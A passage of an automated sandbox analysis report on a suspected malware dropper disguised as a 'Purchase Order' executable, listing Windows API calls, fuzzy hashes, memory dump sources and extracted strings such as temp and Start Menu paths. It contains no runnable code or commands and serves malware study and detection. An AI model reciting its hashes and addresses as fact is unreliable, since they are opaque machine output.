                                            • Opcode Fuzzy Hash: f59ec2b108597a3a065557cc140b5c986e6c73f7c06a157e0f604f29401ca6bb
                                            • Instruction Fuzzy Hash: 43F0A5B35042E3EFC390EF6A8444F053BF0E348304B21452AE1ADDE251E3344844CF15
                                            APIs
                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                            • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                            • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                            • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                            APIs
                                            • SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                            • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                            • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                            • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                            • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                            • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                            • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                            APIs
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                              • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                              • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,?), ref: 00406756
                                              • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            • Opcode ID: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                            • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                            • Opcode Fuzzy Hash: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                            • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E
                                            APIs
                                            • GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: 10a6443911b160220a1c5b77e52f245b7bae4ec7890d52492dbe73ea1f8ad13b
                                            • Instruction ID: 9c76b0354904bd050012df8c63b4a1be5ccb8ff4eb572635f793b0af42bde32c
                                            • Opcode Fuzzy Hash: 10a6443911b160220a1c5b77e52f245b7bae4ec7890d52492dbe73ea1f8ad13b
                                            • Instruction Fuzzy Hash: 35B01273A00041FFEE00EB65CC06F303264D740300F104000F609C4140C120CC008638
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                            • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                            • GetClientRect.USER32(?,?), ref: 0040550B
                                            • GetSystemMetrics.USER32(00000002), ref: 00405512
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                            • ShowWindow.USER32(?,?), ref: 004055AE
                                            • GetDlgItem.USER32(?,?), ref: 004055CF
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                            • GetDlgItem.USER32(?,?), ref: 004054DD
                                              • Part of subcall function 00404266: SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                            • GetDlgItem.USER32(?,?), ref: 00405621
                                            • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                            • CloseHandle.KERNEL32(00000000), ref: 00405636
                                            • ShowWindow.USER32(00000000), ref: 0040565A
                                            • ShowWindow.USER32(?,?), ref: 0040565F
                                            • ShowWindow.USER32(?), ref: 004056A9
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                            • CreatePopupMenu.USER32 ref: 004056EE
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                            • GetWindowRect.USER32(?,?), ref: 00405722
                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040573B
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                            • OpenClipboard.USER32(00000000), ref: 00405783
                                            • EmptyClipboard.USER32 ref: 00405789
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                            • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                            • CloseClipboard.USER32 ref: 004057E4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                            • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                            • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                            • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                              • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,?,004048DE), ref: 00405917
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                              • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                            • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                              • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                              • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                              • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call
                                            • API String ID: 2624150263-1648024196
                                            APIs
                                              • Part of subcall function 73CF121B: GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            • GlobalAlloc.KERNEL32(?,00001CA4), ref: 73CF1C6F
                                            • lstrcpyW.KERNEL32(00000008,?), ref: 73CF1CB7
                                            • lstrcpyW.KERNEL32(00000808,?), ref: 73CF1CC1
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1CD4
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DB6
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DBB
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DC0
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1FAA
                                            • lstrcpyW.KERNEL32(?,?), ref: 73CF2144
                                            • GetModuleHandleW.KERNEL32(00000008), ref: 73CF21B9
                                            • LoadLibraryW.KERNEL32(00000008), ref: 73CF21CA
                                            • GetProcAddress.KERNEL32(?,?), ref: 73CF2224
                                            • lstrlenW.KERNEL32(00000808), ref: 73CF223E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                            • String ID:
                                            • API String ID: 245916457-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: p!C$p!C
                                            • API String ID: 0-3125587631
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                            • GetDlgItem.USER32(?,?), ref: 004044A2
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                            • GetSysColor.USER32(?), ref: 004044D0
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                            • lstrlenW.KERNEL32(?), ref: 004044F1
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                            • SendMessageW.USER32(00000000), ref: 00404573
                                            • GetDlgItem.USER32(?,?), ref: 0040459E
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                            • SetCursor.USER32(00000000), ref: 004045F2
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                            • SetCursor.USER32(00000000), ref: 0040460E
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                            • SendMessageW.USER32(?,00000000,00000000), ref: 0040464F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Call$N$gC@
                                            • API String ID: 3103080414-2733886405
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                            • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                              • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                              • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                            • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                            • wsprintfA.USER32 ref: 00405F85
                                            • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,?,004310E8,?,?,?,?,?), ref: 00405FC0
                                            • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FCF
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                            • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]
                                            • API String ID: 2171350718-461813615
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                            • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                            • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                            Strings
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 0040654E
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                            • *?|<>/":, xrefs: 004065A0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 589700163-1494957277
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                            • GetSysColor.USER32(00000000), ref: 004042F3
                                            • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                            • SetBkMode.GDI32(?,?), ref: 0040430B
                                            • GetSysColor.USER32(?), ref: 0040431E
                                            • SetBkColor.GDI32(?,?), ref: 0040432E
                                            • DeleteObject.GDI32(?), ref: 00404348
                                            • CreateBrushIndirect.GDI32(?), ref: 00404352
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF24DA
                                              • Part of subcall function 73CF122C: lstrcpynW.KERNEL32(00000000,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF123C
                                            • GlobalAlloc.KERNEL32(?), ref: 73CF2460
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73CF247B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                            • String ID: @H3w
                                            • API String ID: 4216380887-4275297014
                                            APIs
                                            • lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                            • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                            • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                            • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                            • GetMessagePos.USER32 ref: 00404C0F
                                            • ScreenToClient.USER32(?,?), ref: 00404C29
